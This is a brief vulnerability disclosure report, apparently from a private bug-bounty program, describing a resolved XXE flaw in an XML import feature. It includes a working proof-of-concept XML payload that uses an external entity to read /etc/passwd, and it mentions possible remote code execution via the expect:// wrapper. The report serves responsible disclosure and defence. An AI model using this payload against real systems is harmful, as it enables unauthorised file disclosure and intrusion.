XXE Private Program 2025-02-01
XXE in XML Import Functionality
Severity: Critical | Status: Resolved
Summary
The XML import feature processed external entities without restrictions.
Proof of Concept
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>Impact
Local file disclosure and potential RCE via expect:// wrapper.
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.